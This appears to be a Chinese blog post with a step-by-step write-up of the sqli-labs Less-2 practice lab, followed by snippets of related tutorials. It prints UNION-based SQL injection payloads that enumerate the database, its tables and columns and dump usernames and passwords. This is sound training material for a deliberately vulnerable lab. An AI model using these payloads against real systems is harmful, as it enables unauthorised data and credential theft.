SQL注入漏洞解析--less-2

已于 2024-02-22 17:56:40 修改
阅读量422 收藏 5
点赞数 10
文章标签: sql 数据库
于 2024-02-22 17:55:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/duoba_an/article/details/136239069
版权

首先我们进入第二关

思路:

1.先判断是什么类型的注入

2.根据类型我们在找注入点

步骤:

1.提示我们输入id数字,那我们先输入1猜一下

2.这里正常回显,当我们后边加上'时可以看到报错,且报错信息看不到数字,所有我们可以猜测sql语句应该是数字型注入

3. 知道时数字型注入后就简单了,和之前第一关的差不多一样

先查库,在查表和列,最后输出显示

?id=1 order by 1

4. 我们就一个一个的试,当输入4时报错不知道第四列

5. 欧克,接下来就是正常操作

?id=-1 union select 1,2,3

6. 我们利用第二个位置开始查

?id=-1 union select 1,database(),3

7. 库名查到就是security

?id=-1%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27

8. 这不,表名(我们用一下users)就出来了,接下来查一下列名

?id=-1%20union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27and%20table_name="users"

9. 这三个已经摆在面前了,那就看一下下里边都有啥

/?id=-1%20union%20select%201,2,group_concat(username,0x3a,password)%20from%20%20users

10用的和第一个数据库一样的,所以里边的内容都是一样的,到这里就结束了。 

duoba_an
关注
  • 10
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
我的白帽之路-SQL注入之数字型注入【sqli-labs Less-2】
Offsett的博客
02-27 365
我的白帽之路
宏景HCM SQL注入漏洞(CNVD-2023-08743) ,hrms加解密工具
11-07
宏景HCM SQL注入漏洞(CNVD-2023-08743) ,hrms加解密工具。需要 Java1.8 环境,执行如下命令启动 HrmsTool 工具, -e 是加密, -d 是解密。 $ java -jar HrmsTool.jar Usage: java -jar HrmsTool.jar -e xxx java ...
sql注入sqli-labs-less-2 数值型报错注入
没有故事
03-03 376
' 进行试探,第二关数值型,没有字符串的单引号,所以输入单引号报错,id=1 order by 3 --+
sql注入Less-2
qq_38595432的博客
09-16 192
sql="SELECT∗FROMusersWHEREid=sql = "SELECT * FROM users WHERE id=sql="SELECT∗FROMusersWHEREid=id LIMIT 0,1";http://192.168.200.26/Less-3/?id=-1? union select 1,2,database();–+使用id=-1 便可以显示union的内容了 使用–+注释掉 limit后面的内容group_concat(table_name) 去重SQL注入: 随便输入内容
SQLi-LABS Less-2,联合注入+报错注入_如何判断less-2的注入点
最新发布
2401_83974660的博客
04-18 382
页面显示数据库的报错信息,符合报错注入的条件。按照第4个字段排序开始报错,确定字段数为:3。页面正常报错,确定报错函数可以使用。
SQLi靶场
diaobusi的博客
10-24 334
在学习SQL注入时,要对SQL的语法有大致上的了解,并且越熟练越好,在进行注入前要仔细分析,它使用的什么类型的SQL语句,以便对症下药,确定类型后,如果是查询类的注入,还要去分析出源语句中,使用了几个字段,当掌握这些信息后,就开始考虑如何闭合语句。判断SQL语句类型构造永真POC判断是否存在SQL注入爆破源语句字段数量爆破成功后即可进行攻击在这一关总体思路与第一关基本一致,只不过在本关中使用的是数值内省SQL语句,在闭合语句方面不用考虑引号等关系。介绍了mysql的一个安全配置项。
sqli-labs 通关教程 Less-2
一期一会的博客
12-03 868
区分类型(数字型) http://127.0.0.1/sqlilabs/Less-2/?id=1 and 1=1 http://127.0.0.1/sqlilabs/Less-2/?id=1 and 1=2 查找回显点 使用二分法,确定回显点,首先试6,没反应,试3,有反应;试5,无反应,试4,无反应。可以确定回显点为3 http://127.0.0.1/sqlilabs/Less-2/?id=1 order by 3 查看存放位置 http://127.0.0.1/.
SQL注入漏洞简单挖掘-01
09-15
SQL注入漏洞简单挖掘-01 SQL注入漏洞是Web应用程序中的一种常见漏洞,它是由于Web应用程序对用户输入的不当处理所导致的。SQL注入漏洞的成因是由于Web应用程序使用用户输入数据构建SQL语句时,没有正确地过滤和转义...
SQL2022-SSEI-Dev
11-14
SQL2022-SSEI-Dev
WordPress 5.8.3 SQL注入漏洞 CVE-2022-21661.pdf
09-27
这是最近爆出来的一个 wordpress 的 SQL 注入漏洞,实际上不是一个可以直接利用的洞,而是wordpress 的一个核心函数 WP_Query 的漏洞,这个函数常被插件使用,因此能造成的危害也挺大,前台后台都有可能
sqli-labs靶场第二关
gou1791241251的博客
12-19 733
传入id=1查看页面回显 第一步:判断注入类型。如字符型,数值型 传入单引号和双引号,或不传入参数进行测试。在末尾加入–+进行注入sql语句后面的代码 不传入单引号或双引号页面正常 第二步:判断表字段数 使用order by order by 3 时页面正常 order by 4时页面回显异常,所以有三个字段 第三步:使用联合查询获取数据库相关信息与查看页面回显位置 接下来查看数据库名和版本号 接下来通过mysql数据库中的information_schema数据中的tables表来查询所有
sqil-labs sql注入 LESS2联合注入教程
m0_70787202的博客
03-19 160
less2联合注入教程
Sqli-labs靶场笔记2(Less-2~4 联合注入)
m0_52233414的博客
04-01 180
sqli-labs的Less2到Less4三道题都可以用联合注入解决,所以放到一起来记录,联合注入的基本思路方法可以看我的上一篇,这里只针对题目来写。
sql注入系列之Sqli-labs(less-2)
BetsyMyGirl的博客
11-30 1424
判断注入点 http://192.168.81.210/sqli/Less-2/?id=1’输入单引号发现出现了sql语句报错,可以知道单引号已经进入到数据库里执行了,语句类似于 select * from users where id =1' limit 0,1 因为正常的情况下,用户只能将搜索的参数传入到数据库里面进行查询,是不可能去修改查询语句的,上方的报错就是由于用户修改了查询的语句而引起的,将以上语句代入到自己的数据库里执行也是会报错的,因为多了一个单引号。 判断注入类型 输入1 and 1=1
LESS2(sql注入
qq_44598397的博客
03-14 887
Less2 源码 输入:http://127.0.0.1/sqlilabs/Less-2/?id=2’ 输出错误: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server v ersion for the right syntax to use near ‘’ LIM...
sql注入less2
Mdcq123的博客
10-15 234
http://192.168.197.146/sqli-labs/sqli-labs/Less-2/?id=-1 union selcet 1,database(),3 http://192.168.197.146/sqli-labs/sqli-labs/Less-2/?id=-1 union select 1,(select group_concat(table_name) from infor...
sql注入-Less-2-4
dahege666的博客
04-03 327
Less-2 添加一个id,响应正常 将'(单引号)添加到数字中 我们得到了一个 Mysql 返回的错误,提示我们语法错误。 现在执行的查询语句如下: Select * from TABLE where id = 1’ ; 所以这里的单引号破坏了查询,导致抛出错误。因此我们得出的结果是,查询代码使用了整数。 Select * from TABLE where id = (so...
SQL注入漏洞-手工注入
05-21
对于SQL注入漏洞的手工注入,建议使用一些工具来进行测试,如SQLMap、Havij等。这些工具可以通过一些特定的语句来测试目标网站是否存在SQL注入漏洞,并且可以自动化执行攻击,并且提供详细的攻击日志,方便测试人员...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

duoba_an

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值